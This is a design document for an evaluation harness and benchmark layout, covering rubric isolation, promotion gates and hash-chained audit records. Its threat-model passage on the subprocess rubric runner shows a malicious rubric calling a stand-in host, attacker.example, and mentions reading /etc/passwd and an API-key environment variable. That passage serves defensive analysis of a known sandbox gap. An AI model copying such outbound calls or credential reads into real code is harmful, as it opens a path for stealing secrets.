Phase 6.5 — Per-task-class eval harness + first benches: Final design¶
Status: Design of record (synthesized from three competing designs + critique).
Synthesized by: Graph-of-Thought synthesizer subagent
Date: 2026-05-12
Sources: design-performance.md · design-security.md · design-best-practices.md · critique.md
Lens summary¶
The synthesis is best-practices-shaped on the public surface, security-shaped on the load-bearing trust boundaries, and performance-shaped only where it can be added later without breaking the audit chain. The single non-reversible decision — rubric isolation — goes to the security lens: the rubric runs in a per-case subprocess (not the harness's Python process), with stdin/stdout JSON I/O and a hard wall-clock cap. We do not ship Firecracker/gVisor in Phase 6.5 (the critic correctly flagged the macOS/CI runner-substrate problem); we ship a subprocess.run rubric runner with env={}, cwd=tmpfs-scratch, and a documented RubricRunner Protocol so a future ADR can swap subprocess for microVM without touching BenchScore shape or the audit chain. Cache, parallelism, Sigstore anchors, and per-case microVMs are all deferred — the critic's strongest argument is that the evidence shape must be right now (because retrofitting changes the score), and everything else is layerable.
The runner is serial in Phase 6.5 (best-practices + security), with a single registered seam (RubricRunner Protocol; concurrency parameter on run_eval defaulting to 1) so the performance lens can land an asyncio.Semaphore pool in Phase 7+ without re-shaping anything. Audit records are chain-linked Phase-0-shaped JSON files (best-practices' Phase-0 reuse + security's prev_hash chain), but Sigstore anchors and operator-fingerprint signing are deferred — the critic correctly identified them as paying every-night costs to detect a threat (A3) that already requires shell on the operator. Promotion stays read-only verdict + hand-edited PR against bench/{tc}/registration.py#current_tier (security's TB-6 shape, slightly amended — tier state lives next to the bench, not in a separate docs/trust-tiers.yaml, because the latter creates a cross-bench central edit Phase 7 cannot make under its no-edits-to-existing-code invariant).
Goals (concrete, measurable)¶
| # | Goal | Source |
|---|---|---|
| G1 | `src/codegenie/eval/` package exports ≤ 8 public names; `mypy --strict` clean; ruff C901 complexity ≤ 8/function. | [B] |
| G2 | `BenchScore` is `frozen=True`, `extra="forbid"`; score ∈ [0, 1] validated; static-introspection test rejects field names matching `confidence` \| `llm` \| `self_reported` \| `model_says`. | [B+S] (mirrors Phase 5 ADR-0014) |
| G3 | Rubric runs in an isolated subprocess (`subprocess.run`, `env={}`, `cwd=<tmpfs scratch>`, hard wall-clock cap, JSON stdin/stdout). The rubric is never imported into the harness Python process. | [S] (modulated: subprocess, not microVM, in Phase 6.5) |
| G4 | Promotion is read-only: `PromotionGate.evaluate(...) → PromotionVerdict` is a pure function; no code path mutates a tier. Tier change is a hand-edited PR against `bench/{tc}/registration.py#current_tier` reviewed by CODEOWNERS. | [B+S] |
| G5 | Audit records are JSON files at `.codegenie/eval/runs/<utc-iso>-<short>.json` (mode 0600, atomic write via `os.replace`); each record carries `prev_hash` linking to the previous run for the same task class; `codegenie eval verify` re-walks the chain. | [S] (chain) + [B] (Phase-0 RunRecord shape) |
| G6 | Fence-CI gate: a task class registered via `@register_task_class("foo")` without `bench/foo/{cases,rubric.py,registration.py,README.md}` and ≥ `min_cases_for_promotion[bronze]` cases fails CI with a specific diagnostic naming the missing path. AST-walk plus a literal-decorator-name lint rule (rejects aliased imports of `register_task_class` inside `bench/*/registration.py`). | [B+S] (closes critic's alias-dodge) |
| G7 | `codegenie eval run --task-class=vuln-remediation` exits 0 against the backfilled bench; emits per-case JSONL to stdout + a single aggregate; writes the audit record. CI runs cassettes only (Phase 4 discipline); no live LLM calls in CI. | [P+B+S] (all three agree) |
| G8 | `BenchScore.cost_usd` is mandatory and aggregated into `BenchRunReport.total_cost_usd`. Operator live runs accept `--max-cost-usd` (default $5.00) and abort on exceed. Concurrent live runs use a flock-based per-task-class lock so the cost cap holds across processes. | [P] + critic's concurrent-cost-leak fix |
| G9 | Net-new runtime dependencies in `[project].dependencies`: 0. Pydantic v2, click, structlog, pyyaml already pinned; blake3 is added to `[project.optional-dependencies].eval` only (BLAKE3 chain hashing matches Phase 0; eval is opt-in install). | [B] modulated: hashing matches Phase 0 (critic flagged the SHA-256 vs BLAKE3 divergence) |
| G10 | Total LOC for `src/codegenie/eval/` excluding docstrings + tests: ≤ 700 LOC (modest bump over [B]'s 600 to absorb the subprocess rubric runner + chain hashing). | [B] modulated |
| G11 | Cache layer: deferred to Phase 7+ (or Phase 13) with a documented seam in `RubricRunner` and `run_eval` so it can land without changing `BenchScore` or audit shape. Phase 6.5 ships no cache. | [synth] (resolves the critic's hardest attack on [P]) |
| G12 | Parallelism: deferred to Phase 7+ with a `concurrency: int = 1` parameter on `run_eval` and a `RubricRunner` that is process-isolation-safe. Phase 6.5 runs serial. | [synth] (resolves critic's "serial is asserted, not argued" by accepting [B+S] for now and naming the upgrade path) |
| G13 | Sigstore anchors + operator-fingerprint signing: deferred to Phase 16 production hardening (tracked as a new ADR slot). Phase 6.5's chain detects local tamper; Phase 16's anchors detect host-compromise. | [synth] (resolves critic's L6 cost/benefit attack on [S]) |
Architecture¶
```text
src/codegenie/eval/
├── __init__.py        # public surface (≤ 8 re-exports)
├── models.py          # Pydantic v2: BenchCase, BenchScore, BenchRunReport,
│                      # PromotionVerdict, EvalRunRecord (the chained audit entry)
├── registry.py        # @register_task_class + TaskClassRegistry + default_registry
│                      # (mirrors @register_probe shape exactly; [B])
├── rubric.py          # Rubric Protocol (runtime_checkable) + RubricRunner Protocol
│                      # (the seam for subprocess-now / microVM-later)
├── rubric_runner.py   # SubprocessRubricRunner: spawns python -c "<rubric>"
│                      # with env={}, cwd=tmpfs-scratch, JSON stdin/stdout,
│                      # hard wall-clock cap. Strategy-pattern with a stub
│                      # InProcessRubricRunner for tests only (gated by env var,
│                      # never used in CI or by `codegenie eval run`).
├── loader.py          # bench/{tc}/cases/ → tuple[BenchCase, ...];
│                      # imports bench/{tc}/registration.py via real package path
│                      # (sys.path prepend on bench/, not synthesized name;
│                      # closes critic's importlib hand-wave)
├── runner.py          # run_eval(...) → BenchRunReport; SERIAL by default;
│                      # concurrency parameter is the seam for Phase 7+;
│                      # SUT invocation is async-aware (asyncio.run wrapping
│                      # documented and tested; closes critic's SIGALRM problem
│                      # by using asyncio.wait_for, not signal.SIGALRM)
├── promotion.py       # PromotionGate.evaluate(...) → PromotionVerdict; PURE
│                      # function. Reads `current_tier` from the registration
│                      # (TaskClass.current_tier), not from a central YAML.
├── audit.py           # write_run_record(report, out_dir) → Path;
│                      # chain-walks prior records for prev_hash;
│                      # codegenie eval verify command re-walks the chain.
├── errors.py          # EvalError hierarchy under CodegenieError
└── cli.py             # `codegenie eval run` + `codegenie eval verify`
                       # + `codegenie eval promote-verdict` subcommands.

bench/                           # contract territory (CODEOWNERS-gated)
├── README.md                    # the bench/ contract itself
├── vuln-remediation/
│   ├── registration.py          # @register_task_class("vuln-remediation",
│   │                            #     current_tier="bronze",
│   │                            #     min_cases_for_promotion={"silver": 10, "gold": 30, ...})
│   ├── rubric.py                # one class implementing Rubric (run via SubprocessRubricRunner)
│   ├── README.md                # what this bench measures + how to add cases
│   └── cases/
│       └── {case-id}/
│           ├── case.toml        # provenance, disposition, difficulty
│           ├── input/           # frozen repo snapshot OR input-pointer.toml
│           └── expected/        # ground-truth diff + expected CVE delta
├── migration-chainguard-distroless/
│   ├── registration.py
│   ├── rubric.py
│   ├── README.md
│   └── cases/...                # ≥3 seed cases; Phase 7 expands to ≥10

.codegenie/eval/runs/<utc-iso>-<short>.json   # chained audit records
```
Why this shape.
- The package layout is [B]'s — every name a Phase 0/Phase 5 contributor recognizes.
- The RubricRunner strategy is the load-bearing departure: it bakes the security boundary into the type system today and lets the implementation evolve from subprocess to microVM later via ADR + a one-class swap.
- Tier state lives on the registration (not in docs/trust-tiers.yaml) so adding a new task class in Phase 7 is genuinely "extension by addition" — the critic's roadmap-level point #1.
Components¶
src/codegenie/eval/registry.py — @register_task_class + TaskClassRegistry¶
- Provenance: `[B]` with one `[S]` element (CODEOWNERS protection on `bench/**/registration.py`).
- Purpose: Open registry; same shape as `@register_probe` and `@register_signal_kind`.
- Interface:

  ```python
  @register_task_class(
      "vuln-remediation",
      current_tier="bronze",
      min_cases_for_promotion={"silver": 10, "gold": 30, "platinum": 100},
  )
  class VulnRemediationRubric(Rubric): ...
  ```

  `default_registry: TaskClassRegistry` (module-level singleton); `TaskClassRegistry()` is constructable for tests; `TaskClassAlreadyRegistered` raised on collision (mirrors `SignalKindAlreadyRegistered`).
- Internal design: `_task_classes: dict[str, TaskClass]`. The decorator returns the class unchanged.
- Why this choice over the alternatives: `[P]`'s `importlib.metadata` entry-point lookup is rejected: it requires installing each `bench/{tc}/` as a distribution, which (a) makes Phase 7 require a `pyproject.toml` edit (violates extension-by-addition); (b) makes test isolation hard (entry points are global). `[S]`'s `tools/digests.yaml` rubric pin is rejected for the same reason: a central manifest edit on every rubric change blocks Phase 7's no-edits invariant. `[B]`'s direct decorator import wins.
- Tradeoffs accepted: Module-level singleton requires test discipline (use a fresh `TaskClassRegistry()` in unit tests). Same trade Phase 0 made.
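A minimal sketch of the registry shape described above, using only the standard library. The `registry=` keyword on the decorator is a hypothetical test hook added for illustration, and the `TaskClass` fields are reduced to those named in this section; the real module may differ.

```python
from dataclasses import dataclass, field


class TaskClassAlreadyRegistered(Exception):
    """Raised when two registrations claim the same task-class name."""


@dataclass(frozen=True)
class TaskClass:
    name: str
    current_tier: str
    min_cases_for_promotion: dict[str, int]
    rubric_class: type


@dataclass
class TaskClassRegistry:
    _task_classes: dict[str, TaskClass] = field(default_factory=dict)

    def register(self, task_class: TaskClass) -> None:
        existing = self._task_classes.get(task_class.name)
        if existing is not None:
            # Name both qualnames so the collision is easy to locate.
            raise TaskClassAlreadyRegistered(
                f"{task_class.name!r}: {existing.rubric_class.__qualname__} "
                f"vs {task_class.rubric_class.__qualname__}"
            )
        self._task_classes[task_class.name] = task_class

    def get(self, name: str) -> TaskClass:
        return self._task_classes[name]


default_registry = TaskClassRegistry()


def register_task_class(name, *, current_tier, min_cases_for_promotion, registry=None):
    """Decorator factory. `registry` is a hypothetical hook for test isolation."""
    target = registry if registry is not None else default_registry

    def decorator(cls):
        target.register(
            TaskClass(name, current_tier, dict(min_cases_for_promotion), cls)
        )
        return cls  # the class is returned unchanged

    return decorator
```

Passing a fresh `TaskClassRegistry()` in unit tests keeps registrations out of the module-level singleton, which is the test discipline the tradeoff above asks for.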
src/codegenie/eval/models.py — Pydantic v2 models¶
- Provenance: `[B]` shape, `[S]` field-name discipline, `[P]` cost field.
- Purpose: All wire types for the eval domain.
- Interface: `BenchCase`, `BenchScore`, `BenchRunReport`, `PromotionVerdict`, `EvalRunRecord` (chained audit entry), `TaskClass` (frozen `dataclass` with `rubric_class: type[Rubric]`).

  ```python
  class BenchScore(BaseModel):
      model_config = ConfigDict(frozen=True, extra="forbid")
      passed: bool
      score: float = Field(ge=0.0, le=1.0)
      breakdown: dict[str, float]      # flat: no nested dicts/lists in values
      failure_modes: tuple[str, ...]   # tuple for immutability
      cost_usd: float = Field(ge=0.0)
      duration_seconds: float = Field(ge=0.0)
      # No `confidence`, `llm_*`, `self_reported_*`, `model_says_*` fields.
      # Enforced by tests/unit/test_bench_score_static.py (mirrors Phase 5
      # ADR-0014's test_objective_signals_static.py).


  class EvalRunRecord(BaseModel):
      model_config = ConfigDict(frozen=True, extra="forbid")
      schema_version: Literal[1]
      task_class: str
      run_id: str                                 # SHA-256 of (task_class || sorted_case_ids || score_jsons)
      report: BenchRunReport
      case_digest_set: dict[str, str]             # case_id → BLAKE3 of case directory
      rubric_digest: str                          # BLAKE3 of rubric.py
      cassette_digest_set: dict[str, str | None]  # case_id → BLAKE3 of cassette file
      harness_version: str
      started_at: datetime
      finished_at: datetime
      prev_hash: str                              # SHA-256 of previous record's bytes; "0"*64 at genesis
  ```
- Internal design: `extra="forbid", frozen=True` everywhere. `BenchScore.breakdown` is `dict[str, float]` (no nested values), the same anti-smuggle pattern as Phase 5 ADR-0014's `ObjectiveSignals.extra`. `failure_modes` is `tuple` not `list` so the type system rejects mutation.
- Why this choice over the alternatives: `[P]`'s `BenchScore` collapsed `provenance` and `case_id` into `BenchScore`; we keep them on `BenchCase`/`EvalRunRecord` to keep `BenchScore` purely "the rubric's facts about one case" (CLAUDE.md "Facts not judgments"). `[S]`'s `BenchRunRecord` becomes our `EvalRunRecord` with the same `prev_hash` chain but without Sigstore `operator_fingerprint` and `microvm_image_digest` (deferred per G13).
- Tradeoffs accepted: Banned-substring static check is necessary but not sufficient (critic correctly flagged `evidence_strength` could smuggle confidence). The structural defense is `extra="forbid"` + the per-rubric review; the substring check is an early warning, not the whole defense. Documented in the test's docstring.
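The banned-substring check can be sketched as below. This is an illustration only: `ScoreStandIn` is a hypothetical stdlib dataclass standing in for the Pydantic `BenchScore` so the snippet runs without third-party packages, and `banned_field_names` is an assumed helper name. With Pydantic v2, the same helper could presumably be fed the keys of `BenchScore.model_fields`.

```python
import re
from dataclasses import dataclass, fields

# Substrings named in G2; matched case-insensitively anywhere in a field name.
BANNED = re.compile(r"confidence|llm|self_reported|model_says")


def banned_field_names(names):
    """Return the sorted field names that contain a banned substring."""
    return sorted(n for n in names if BANNED.search(n.lower()))


@dataclass(frozen=True)
class ScoreStandIn:
    """Hypothetical stand-in mirroring the BenchScore field names."""
    passed: bool
    score: float
    breakdown: dict
    failure_modes: tuple
    cost_usd: float
    duration_seconds: float


violations = banned_field_names(f.name for f in fields(ScoreStandIn))
```

The check also shows its own limit: a name such as `evidence_strength` passes the filter, which is why the section treats it as an early warning rather than the whole defense.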
src/codegenie/eval/rubric.py + rubric_runner.py — Rubric Protocol + RubricRunner strategy¶
- Provenance: `[B]` Protocol shape; `[S]` isolation discipline; `[synth]` subprocess-now-microVM-later split.
- Purpose: The contract every task class implements + the harness-side execution boundary.
- Interface:

  ```python
  @runtime_checkable
  class Rubric(Protocol):
      """Stateless. One method. Implementations live in bench/{tc}/rubric.py."""

      def score(self, case: BenchCase, harness_output: Mapping[str, Any]) -> BenchScore: ...


  class RubricRunner(Protocol):
      """The execution boundary. Strategy pattern: SubprocessRubricRunner now,
      future MicroVMRubricRunner under ADR amendment."""

      async def run(
          self,
          rubric_path: Path,
          case: BenchCase,
          harness_output: Mapping[str, Any],
          *,
          wall_clock_cap_seconds: float,
      ) -> BenchScore: ...


  class SubprocessRubricRunner:
      """Default. Spawns `python -I -B <rubric_runner_entrypoint> < inputs.json > output.json`
      with env={}, cwd=<tmpfs scratch dir>, no inherited file descriptors, hard
      wall-clock cap via asyncio.wait_for(proc.communicate(...), timeout=...) on the
      process returned by asyncio.create_subprocess_exec(...).
      JSON stdin/stdout: the rubric never shares memory with the harness.
      The runner copies bench/{tc}/rubric.py bytes into the scratch dir
      before spawn (no import).
      """
  ```
- Internal design: `SubprocessRubricRunner` uses `asyncio.create_subprocess_exec` with `env={}`, `cwd=<scratch>`, `stdin=PIPE`, `stdout=PIPE`, `stderr=PIPE`. Inputs serialized as JSON (`{case: <BenchCase.model_dump>, harness_output: ...}`) into stdin. Output read from stdout, parsed via `BenchScore.model_validate_json` (catches `extra="forbid"` violations + range errors). On timeout: `proc.kill()`, return `BenchScore(passed=False, failure_modes=("rubric_timeout",), score=0.0, ...)`. On non-zero exit or malformed output: `BenchScore(passed=False, failure_modes=("rubric_malformed",), ...)`. The `rubric.py` file is copied into scratch (not imported); the subprocess runs `python /scratch/rubric_entrypoint.py` where the entrypoint loads `/scratch/rubric.py` and dispatches.
- Why this choice over the alternatives: `[P]` and `[B]` import the rubric in-process; critic correctly identifies this as RCE-on-operator-host. `[S]` mandates Firecracker microVM; critic correctly identifies that GitHub-hosted CI runners can't run nested-virt without explicit config, and that gVisor-on-Lima is a second sandbox stack on top of Phase 5's DinD. Subprocess with `env={}` and `cwd=<tmpfs>` is the load-bearing 80% of microVM isolation at 5% of the cost. It blocks env-var read, starts the rubric in the scratch directory (a working directory, not a filesystem jail), breaks shared memory, and runs anywhere Python runs. It does not block network egress or reads outside scratch such as `/etc/passwd`; those are addressed by a future ADR-amend that swaps `SubprocessRubricRunner` for `MicroVMRubricRunner` in Phase 16. Crucially, the `BenchScore` shape is identical either way, so swapping runners does not invalidate prior audit records (the critic's strongest argument for getting rubric isolation right now).
- Tradeoffs accepted: Subprocess does not block network egress in Phase 6.5. A malicious rubric merged through CODEOWNERS can `urllib.request.urlopen("http://attacker.example")`. We accept this on the grounds that (a) CODEOWNERS + two-reviewer rule (G3 + the new invariant on `bench/**/rubric.py`) is the L1 defense; (b) the production sandbox in Phase 5 already establishes the network-egress-blocking pattern that Phase 16 will inherit; (c) shipping subprocess now preserves audit-chain comparability, whereas microVM-from-day-one would have required Firecracker on an unsupported substrate. We document a `tests/adversarial/test_rubric_isolation.py` that asserts `os.environ.get("ANTHROPIC_API_KEY")` returns `None` and that `Path("/scratch/").iterdir()` shows only the expected files; the network-egress test is `xfail` with a pointer to the future ADR.
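The subprocess boundary described above can be sketched as follows, assuming a POSIX host. `run_isolated` is a hypothetical helper name, it returns plain dicts instead of validated `BenchScore` objects, and it passes the rubric source via `-c` rather than copying `rubric.py` into scratch; all three are simplifications for illustration.

```python
import asyncio
import json
import sys
import tempfile


def _failed(mode: str) -> dict:
    # Plain-dict stand-in for BenchScore(passed=False, ...).
    return {"passed": False, "score": 0.0, "failure_modes": [mode]}


async def run_isolated(script: str, payload: dict, *, wall_clock_cap_seconds: float) -> dict:
    """Run `script` in a child interpreter with an empty environment."""
    with tempfile.TemporaryDirectory() as scratch:
        proc = await asyncio.create_subprocess_exec(
            sys.executable, "-I", "-B", "-c", script,
            stdin=asyncio.subprocess.PIPE,
            stdout=asyncio.subprocess.PIPE,
            stderr=asyncio.subprocess.PIPE,
            env={},        # the child sees no inherited environment variables
            cwd=scratch,   # working directory only; not a filesystem jail
        )
        try:
            # communicate() feeds stdin and drains stdout/stderr together,
            # which avoids the pipe deadlock a bare wait() can hit.
            out, _err = await asyncio.wait_for(
                proc.communicate(json.dumps(payload).encode()),
                timeout=wall_clock_cap_seconds,
            )
        except asyncio.TimeoutError:
            proc.kill()
            await proc.wait()
            return _failed("rubric_timeout")
        if proc.returncode != 0:
            return _failed("rubric_malformed")
        try:
            result = json.loads(out)
        except json.JSONDecodeError:
            return _failed("rubric_malformed")
        return result if isinstance(result, dict) else _failed("rubric_malformed")
```

In the real runner the parsed output would go through `BenchScore.model_validate_json`, so schema and range violations would also map to `rubric_malformed`.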
src/codegenie/eval/loader.py — bench-directory loader¶
- Provenance: `[B]` core, `[synth]` import-path fix.
- Purpose: Load `bench/{tc}/cases/*/case.toml` into `tuple[BenchCase, ...]`; trigger `bench/{tc}/registration.py` import for decorator side-effect.
- Interface: `load_task_class(name, bench_root=Path("bench")) -> TaskClass`; `load_cases(task_class) -> tuple[BenchCase, ...]`.
- Internal design: Prepends `bench_root.resolve()` to `sys.path` exactly once (under a `_bench_path_added` module guard), then `importlib.import_module(f"{name.replace('-', '_')}.registration")`; same shape as Phase 0's `codegenie.probes.{name}` import but with the bench root explicitly on `sys.path`. The `_codegenie_bench` synthesized prefix from `[B]` is rejected (critic correctly identified it as not actually working). `case.toml` parsed with stdlib `tomllib`. Sorted by `case_id` for determinism.
- Why this choice over the alternatives: `[P]`'s `importlib.metadata.entry_points` requires distribution install; `[B]`'s synthesized prefix doesn't resolve. `sys.path` prepend is the simplest approach that actually works and matches Phase 0's mental model.
- Tradeoffs accepted: Mutating `sys.path` is global state. We do it once, idempotently, and document it. Tests that need isolation use a fresh `TaskClassRegistry()` and pass `bench_root` explicitly.
src/codegenie/eval/runner.py — run_eval¶
- Provenance: `[B]` shape, `[synth]` async correctness, `[P]` concurrency seam (deferred wire-up).
- Purpose: End-to-end execution for one task class.
- Interface:

  ```python
  async def run_eval(
      task_class_name: str,
      *,
      case_filter: Callable[[BenchCase], bool] | None = None,
      system_under_test: Callable[[BenchCase], Awaitable[Mapping[str, Any]]],
      rubric_runner: RubricRunner | None = None,  # default: SubprocessRubricRunner
      timeout_per_case_seconds: float = 600.0,
      concurrency: int = 1,                       # ≥1; Phase 6.5 ships 1
      max_cost_usd: float = 5.0,
      out_dir: Path = Path(".codegenie/eval/runs"),
      bench_root: Path = Path("bench"),
  ) -> BenchRunReport: ...
  ```
- Internal design: `async def`; the harness is async-shaped from Phase 6.5 because Phase 6's SUT is `async` (LangGraph `ainvoke`). Per-case timeout via `asyncio.wait_for(system_under_test(case), timeout=timeout_per_case_seconds)`, not `signal.SIGALRM` (critic correctly flagged the SIGALRM-vs-asyncio incompatibility in `[B]`). Per-case `try/except Exception` isolates failures: `BenchScore(passed=False, failure_modes=(f"harness_error: {type(e).__name__}",), score=0.0, cost_usd=0.0, ...)`. Concurrency: `asyncio.Semaphore(concurrency)`; with `concurrency=1` the semaphore admits one case at a time, so execution is serial. Cost cap: rolling sum of `BenchScore.cost_usd`; on exceed, cancel outstanding tasks (`task.cancel()`), set `BenchRunReport.aborted=True`, exit non-zero. Concurrent-process cost-cap protection: acquire a `flock` on `<bench_root>/.<task_class>.runlock` for live runs (`max_cost_usd > 0` and not in cassette mode); CI runs (cassettes only) skip the lock.
- Why this choice over the alternatives: `[B]`'s synchronous loop with `signal.SIGALRM` does not compose with Phase 6's async SUT. `[P]`'s aggressive parallelism + content-addressed cache extracts wall-clock at the cost of a `sut_digest` strategy the critic correctly demolished. `[S]`'s strict-serial is the right Phase 6.5 default but its "concurrency is an integrity-correlation risk" is rhetorical, not argued. We ship serial in Phase 6.5 with a documented concurrency parameter, accepting `[B+S]`'s wall-clock cost in exchange for shipping the right concurrency boundary that future phases extend without re-shaping.
- Tradeoffs accepted: No cache in Phase 6.5 (G11). Nightly serial run cost is the cost of correctness-before-speed at this surface size. The `RubricRunner` Protocol + `concurrency` parameter are the seams for Phase 7+ to layer on cache + parallelism without breaking the audit chain.
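The per-case timeout, failure isolation, and rolling cost cap can be sketched as a serial loop. `run_cases` and `_failure` are hypothetical names, scores are plain dicts rather than `BenchScore` objects, and `score_fn` is a synchronous stand-in for the rubric runner; treat it as an illustration of the control flow only.

```python
import asyncio


def _failure(case_id: str, mode: str) -> dict:
    # Plain-dict stand-in for BenchScore(passed=False, cost_usd=0.0, ...).
    return {"case_id": case_id, "passed": False, "failure_modes": (mode,), "cost_usd": 0.0}


async def run_cases(cases, sut, score_fn, *, timeout_s: float, max_cost_usd: float):
    """Run cases one at a time; return (scores, total_cost_usd, aborted)."""
    scores, total_cost, aborted = [], 0.0, False
    for case in cases:
        try:
            output = await asyncio.wait_for(sut(case), timeout=timeout_s)
            score = score_fn(case, output)
        except asyncio.TimeoutError:
            # Listed before `Exception` because TimeoutError is a subclass of it.
            score = _failure(case, "timeout")
        except Exception as exc:
            # One failing case must not stop the remaining cases.
            score = _failure(case, f"harness_error: {type(exc).__name__}")
        scores.append(score)
        total_cost += score["cost_usd"]
        if total_cost > max_cost_usd:
            aborted = True  # cost cap exceeded: stop scheduling further cases
            break
    return scores, total_cost, aborted
```

A concurrent variant would wrap the loop body in tasks gated by `asyncio.Semaphore(concurrency)` and cancel the outstanding tasks when the cap trips; the serial loop simply stops.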
src/codegenie/eval/promotion.py — PromotionGate¶
- Provenance: `[B]` pure-function shape, `[S]` apply-blocking discipline, `[synth]` tier-on-registration location.
- Purpose: Compute a `PromotionVerdict` from a `BenchRunReport` + the registration's tier config.
- Interface:

  ```python
  class PromotionGate:
      def evaluate(
          self,
          task_class: TaskClass,
          report: BenchRunReport,
          target_tier: Literal["silver", "gold", "platinum"],
          tier_thresholds: Mapping[str, float],  # passed in; loaded from registration
      ) -> PromotionVerdict: ...

      def apply(self, *args, **kwargs) -> NoReturn:
          raise PromotionMustBeHumanAuthorized(
              "Tier promotion is a hand-edited PR against "
              "bench/{task_class}/registration.py#current_tier."
          )
  ```

  Verdict carries `current_tier` (read from `task_class.current_tier`), `target_tier`, `evidence_sufficient: bool`, `reasons: tuple[str, ...]` (every failed condition listed individually, not just the first).
- Internal design: Pure function; no I/O writes outside an optional `.codegenie/eval/recommendations/<utc-iso>.json` audit-trail file (informational only). `evidence_sufficient = True` iff `report.mean_score ≥ tier_thresholds[target_tier]` AND `report.passed_count ≥ task_class.min_cases_for_promotion[target_tier]` AND `report.block_severity_failure_modes == ()`.
- Why this choice over the alternatives: `[B]`'s `docs/trust-tiers.yaml` central tier file would force Phase 7 to edit `docs/trust-tiers.yaml`, violating Phase 7's "no edits to existing code" exit criterion. `[S]`'s tier-on-registration is correct; we adopt it. `[S]`'s `apply()` raising unconditionally is a strong "fail-loud" signal; we keep it.
- Tradeoffs accepted: Tier state coupling: `current_tier` lives in code (`registration.py`). A tier promotion is a one-line code change reviewed via the standard PR flow. This is the same mechanism CODEOWNERS already governs; adding a separate YAML store would be ceremony without payoff.
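The three-condition rule for `evidence_sufficient` can be sketched as a pure function. The flat keyword arguments and the `Verdict` dataclass are assumptions made to keep the snippet self-contained; the real gate takes `TaskClass` and `BenchRunReport` objects.

```python
from dataclasses import dataclass


@dataclass(frozen=True)
class Verdict:
    """Stand-in for PromotionVerdict with the four fields named above."""
    current_tier: str
    target_tier: str
    evidence_sufficient: bool
    reasons: tuple[str, ...]


def evaluate(
    *,
    current_tier: str,
    target_tier: str,
    mean_score: float,
    passed_count: int,
    block_severity_failure_modes: tuple[str, ...],
    threshold: float,
    min_cases: int,
) -> Verdict:
    """Pure function: no I/O and no tier mutation."""
    reasons = []
    # Every failed condition is recorded, not just the first one.
    if mean_score < threshold:
        reasons.append(f"mean_score {mean_score} < threshold {threshold}")
    if passed_count < min_cases:
        reasons.append(f"passed_count {passed_count} < min_cases {min_cases}")
    if block_severity_failure_modes:
        reasons.append(f"block-severity failure modes: {block_severity_failure_modes}")
    return Verdict(current_tier, target_tier, not reasons, tuple(reasons))
```

Because the function only returns a value, calling it repeatedly with the same report cannot change any tier, which is the read-only property G4 asks for.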
src/codegenie/eval/audit.py — chained audit-record writer¶
- Provenance: `[B]` Phase-0 RunRecord shape, `[S]` chain hashing (without Sigstore anchors).
- Purpose: Atomically write `EvalRunRecord` to `.codegenie/eval/runs/<utc-iso>-<short>.json`; chain-walk on read.
- Interface:
  - `write_run_record(record: EvalRunRecord, out_dir: Path) -> Path`: computes `prev_hash` from the most recent record for the same task class; writes mode 0600 atomically via `os.replace`.
  - `verify(task_class: str, since: datetime | None = None) -> VerifyResult`: re-walks chain entries; reports gaps and tampered records.
  - No `publish_anchor`: Sigstore + GPG are deferred per G13.
- Internal design: `prev_hash = sha256(read_bytes(prior_record_path))` for the most recent prior record by `started_at` for the same `task_class`. Genesis: `"0" * 64`. BLAKE3 (via `blake3` PyPI dep in `[project.optional-dependencies].eval`) for content hashing of cases/rubric/cassettes; matches Phase 0's `codegenie/hashing.py` (G9; closes the critic's SHA-256-vs-BLAKE3 divergence in `[B]`). The audit-chain identity hash is SHA-256 over the record bytes (matches Phase 0's identity-tuple convention; the chain head is verifiable without BLAKE3 if `eval` extras aren't installed).
- Why this choice over the alternatives: `[P]`'s JSONL stream + `runs.jsonl` index has no chain; once tampered, undetectable. `[S]`'s full Sigstore pipeline pays an every-night cost for a defense layer (L6) whose threat model assumes shell on the operator. We ship the chain (cheap, valuable) and defer Sigstore + GPG anchors to a future phase ADR. The chain alone catches every mid-stream tamper; Sigstore catches post-pull-divergence, which is a Phase 16 concern.
- Tradeoffs accepted: Without Sigstore anchors, an attacker with shell on the operator can rewrite `.codegenie/eval/runs/` end-to-end (recompute every `prev_hash`) and the local chain re-verifies. We accept this because (a) the threat already requires shell-on-operator, (b) the published audit anchor in git history can be added as a trivial follow-on PR (`audit/anchors/eval/<date>.json` with the chain head, no Sigstore), and (c) doing it now would either require Sigstore (paying the operational debt the critic correctly flagged) or operator GPG keys (unrealistic). Documented as a known gap.
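A minimal sketch of the `prev_hash` chain with an atomic write, using only the standard library. It assumes a single task class per directory and that file names sort chronologically (the doc orders by `started_at`); `write_record` and `verify_chain` are hypothetical names, and records are plain dicts rather than `EvalRunRecord` models.

```python
import hashlib
import json
import os
import tempfile
from pathlib import Path

GENESIS = "0" * 64


def _records(out_dir: Path) -> list[Path]:
    # Assumption: names start with a UTC ISO timestamp, so name order is time order.
    return sorted(out_dir.glob("*.json"))


def write_record(payload: dict, out_dir: Path, name: str) -> Path:
    """Append one record whose prev_hash covers the previous record's bytes."""
    out_dir.mkdir(parents=True, exist_ok=True)
    prior = _records(out_dir)
    prev_hash = hashlib.sha256(prior[-1].read_bytes()).hexdigest() if prior else GENESIS
    body = json.dumps({**payload, "prev_hash": prev_hash}, sort_keys=True).encode()
    # mkstemp creates the file readable and writable by the owner only.
    fd, tmp = tempfile.mkstemp(dir=out_dir, suffix=".tmp")
    with os.fdopen(fd, "wb") as fh:
        fh.write(body)
    final = out_dir / f"{name}.json"
    os.replace(tmp, final)  # atomic rename within the same directory
    return final


def verify_chain(out_dir: Path) -> list[str]:
    """Return names of records whose prev_hash does not match their predecessor."""
    problems, expected = [], GENESIS
    for path in _records(out_dir):
        raw = path.read_bytes()
        if json.loads(raw)["prev_hash"] != expected:
            problems.append(path.name)
        expected = hashlib.sha256(raw).hexdigest()
    return problems
```

Editing a record in place changes its SHA-256, so the mismatch surfaces on the record that follows it. As the tradeoff above notes, an attacker who rewrites every later `prev_hash` as well would still pass this local check.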
src/codegenie/eval/cli.py — codegenie eval subcommands¶
- Provenance: `[B]` click structure; `[P]` JSONL-to-stdout discipline; `[S]` `verify` subcommand.
- Purpose: Operator + CI surface.
- Interface:
  - `codegenie eval run --task-class=<name> [--cases=<glob>] [--concurrency=<int>] [--max-cost-usd=<float>] [--out=<path>] [--bench-root=<path>]`
  - `codegenie eval verify --task-class=<name> [--since=<iso>]`
  - `codegenie eval promote-verdict --task-class=<name> --target-tier=<tier>`
